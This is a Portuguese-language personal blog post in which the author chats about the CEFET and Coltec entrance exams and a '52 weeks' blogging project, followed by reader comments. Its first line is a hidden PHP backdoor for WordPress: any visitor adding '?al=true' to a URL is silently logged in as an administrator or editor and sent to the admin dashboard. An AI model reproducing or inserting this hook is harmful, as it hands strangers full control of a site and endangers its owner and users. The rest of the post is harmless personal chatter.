// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2);
Oi pessoal!
Como vão vocês?
Eu estou suuuper bem. Que semaninha deliciosa *-*
Bom, como quem me tem no face sabe, a prova do CEFET foi domingo dia 10, quinta sai o resultado e venho contar pra vocês ok? De qualquer forma, continuem torcendo por mim, domingo agora é a prova do coltec (#semmedinho) e essa é a ultima semana de curso, então daí pra frente ficarei mais “livre” pra escrever por aqui e pra fazer minhas visitinhas pelos blogs de vocês (que saudade disso!).
Sem mais enrolações, vim responder uma semana do Projeto 52 semanas mais que super hiper mega atrasada, mas tá valendo…
![]() |
| ~roubada do amigo Google~ |
Bruh Costa
Eu fico no blog sempre e como o dia inteiro!
Cate-land.blogspot.com
Laura Marques
Nossa, essa penúltima me deu uma ótima ideia, to precisando refletir.
http://o-doce-mundo.blogspot.com.br/
Lola
eu faço tudo isso hehehehe
deitar no sofá e ir longe então nem se fala. Música eu escuto quando o tempo todo. Só não escuto no meu trabalho, pq né? xD
Uma ótima prova pra vc. Estou torcendo por vc nas duas. .o/
bjos
Laura Nolasco
Duas coisas muito boas também! haha 🙂
Laura Nolasco
Haha 🙂
Laura Nolasco
kkkkk também escuto musica o tempo todo! muuuito obrigada Lola… a do cefet vc já viu né? passeeeeei *-*